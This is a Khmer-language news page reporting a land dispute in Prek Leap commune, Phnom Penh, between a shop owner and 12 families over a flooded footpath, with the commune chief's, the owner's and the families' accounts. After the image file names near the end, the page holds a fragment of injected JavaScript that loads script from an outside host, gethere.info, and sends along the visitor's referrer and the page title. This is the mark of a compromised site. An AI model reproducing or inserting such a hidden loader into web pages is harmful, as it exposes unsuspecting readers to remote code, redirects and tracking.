ព្រឹតិ្តការណ៍ថ្មីៗ

ទំនាស់ដីផ្លូវរវាងម្ចាស់ហាង បឹងសំរោង និងប្រជាពលរដ្ឋ ១២គ្រួសារបានផ្ទុះឡើងជាថ្មី

2 ឆ្នាំ មុន 1 tnn_admin

ភ្នំពេញៈ បន្ទាប់ពីមានបណ្តាញសង្គមបង្ហោះរឿងរា៉វទំនាស់ដីផ្លូវរវាងម្ចាស់ហាង បឹងសំរោង និងប្រជាពលរដ្ឋចំនួន ១២គ្រួសារនៅភូមិព្រែកលៀប សង្កាត់ព្រែកលៀបនេះភ្លាម លោក ឃ្លាំង ហួតអភិបាល នៃគណៈអភិបាលខណ្ឌជ្រោយចង្វារ បានចាត់ឱ្យមន្ត្រីពាក់ពន្ធ័ចុះទៅពិនិត្យមើលទីតាំងផ្លូវ ដែលមានទំនាស់នោះភ្លាមៗផងដែរ បុ៉ន្តែដីផ្លូវនេះជាដីកម្មសិទ្ធិរបស់ម្ចាស់ហាង បឹងសំរោង ដែលចៅសង្កាត់សុំឱ្យប្រជាពលរដ្ឋដើរតាំងពីឆ្នាំ១៩៩៨ ហើយក្រោយមកដោយសារទឹកលិចក៏លែងមានមនុស្សដើររហូតដល់សព្វថ្ងៃនេះ។

 

បើតាមរបាយការណ៍របស់លោក ព្រាប មុនី ចៅសង្កាត់ព្រែកលៀប បានបំភ្លឺជូនលោក ឃ្លាំង ហួត អភិបាលខណ្ឌ កាលពីពេលកន្លងមកបានរៀបរាប់យា៉ងក្បោះក្បាយថា កាលពីឆ្នាំ១៩៩៨ ពេលដែលលោកមកធ្វើជាចៅសង្កាត់ព្រែកលៀប ទីតាំងផ្លូវនេះបានពីការជីកស្រះលើដីរបស់ម្ចាស់ហាង បឹងសំរោង ហើយធ្វើជាទំនប់ទប់ទឹក និងធ្វើជាផ្លូវដើរសម្រាប់ក្រុមគ្រួសារគាត់ផង និងអ្នកភូមិផ្សេងៗទៀតផង ដើម្បីទៅបង្កបង្កើនផលនៅដីចំការខាងក្រោយ។ ដល់គេលក់ដីអស់លែងមានអ្នកដើរហើយ ក្រោយមកផ្លូវនេះ មានទឹកលិចយា៉ងជ្រៅខួបប្រាំងខួប វស្សា ហើយកាលនោះ គ្រាន់តែជារបៀបភ្លឺស្រះដើរបណ្តោះអាសន្នតែបុ៉ណ្ណោះ ដែលមិនមែនជាប្រភេទផ្លូវរាបស្មើដូចផ្លូវផ្សេងៗទៀតឡើយ។

 

នៅក្នុងអំឡុងឆ្នាំ២០០៤ សាលាសង្កាត់ព្រែកលៀប បានសុំម្ចាស់ហាង បឹងសំរោង ដើម្បីទុកឱ្យបងប្អូនធ្វើដំណើរបណ្តោះអាសន្នរង់ចាំពេលណាលែងមានអ្នកភូមិដើរចាំគិតទៀត។ បុ៉ន្តែផ្លូវនេះដោយសារទឹកលិចជាប្រចាំមិនមានអ្នកណាប្រើប្រាស់ ហើយខាងសង្កាត់ក៏ឱ្យបងប្អូនប្រជាពលរដ្ឋដើរក្នុងបរិវេណសាលាសង្កាត់បណ្តោះអាសន្នរហូតដល់សព្វថ្ងៃនេះ។

 

លោក មាស ឆុន ម្ចាស់ហាង បឹងសំរោង បានឱ្យដឹងថា កាលពីឆ្នាំ២០០៤ ខាងសង្កាត់បានសុំគាត់ទុកផ្លូវនេះ ២ម៉ែត្រកន្លះ ដើម្បីឱ្យប្រជាពលរដ្ឋដើរចេញចូលទៅចំការខាងក្រោយ ហើយដោយលោកមានចិត្តសណ្តោសប្រណីក៏យល់ព្រមតាមលោកចៅសង្កាត់។ លុះក្រោយមកផ្លូវនេះ ត្រូវលិចទឹក ៥ទៅ៦ម៉ែត្រជាប់រហូតមកដល់បច្ចុប្បន្នដែលមិនអាចធ្វើដំណើរបានទៀតឡើយ បុ៉ន្តែមិនមែនប្រជាពលរដ្ឋ ១២គ្រួសារនោះគ្មានផ្លូវដើរនោះទេ ព្រោះមានផ្លូវតាមសាលាសង្កាត់សម្រាប់ដើរដែលសង្កាត់ជួសជុលផ្លូវក្បែរនោះជារៀងរាល់ឆ្នាំ។

 

លោក មាស ឆុន បានបន្តថា គាត់ជាម្ចាស់ដីស្របច្បាប់ ក៏បានសំណូមពរទៅអាជ្ញាធរសុំសិទ្ធិកាន់កាប់ដីផ្លូវនេះឡើងវិញ មិនអាចធ្វើតាមការទាមទាររបស់ប្រជាពលរដ្ឋ ១២គ្រួសារនោះបានឡើយ ព្រោះដីនេះជាកម្មសិទ្ធិស្របច្បាប់ដែលគាត់កាន់កាប់តាំងក្រោយឆ្នាំ១៩៧៩មកម្លេះ។

 

បើតាមឈ្មោះ មុី ចាន់ និងឈ្មោះ ចាន់ សំបូរ តំណាងប្រជាពលរដ្ឋ ១២គ្រួសារដែលបានប្តឹងសុំទាមទារដីផ្លូវនេះ បានធ្វើការឆ្លើយបំភ្លឺនៅសាលាខណ្ឌកន្លងមក បានរៀបរាប់ថា ដីផ្លូវនេះពួកគាត់កាន់កាប់តាំងពីឆ្នាំ១៩៧៩ រហូតមក បុ៉ន្តែក្រោយមក ក៏លិចទឹកដើរលែងកើត ក៏បាននាំគ្នាដើរតាមសាលាសង្កាត់ព្រែកលៀបវិញ ដូច្នេះទើបពួកគាត់សំណូមពរ សុំយកផ្លូវនេះ រក្សាទុកដូចដើមវិញ ដើម្បីឱ្យពួកគាត់បានដើរចេញចូលលំនៅដ្ឋានរបស់ខ្លួនដូចដើម៕ដោយ៖ ៣៧នាគខ្មៅ

img-20161123-wa0199 img-20161123-wa0198 img-20161123-wa0197 img-20161123-wa0196 img-20161123-wa0195 img-20161123-wa0194s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!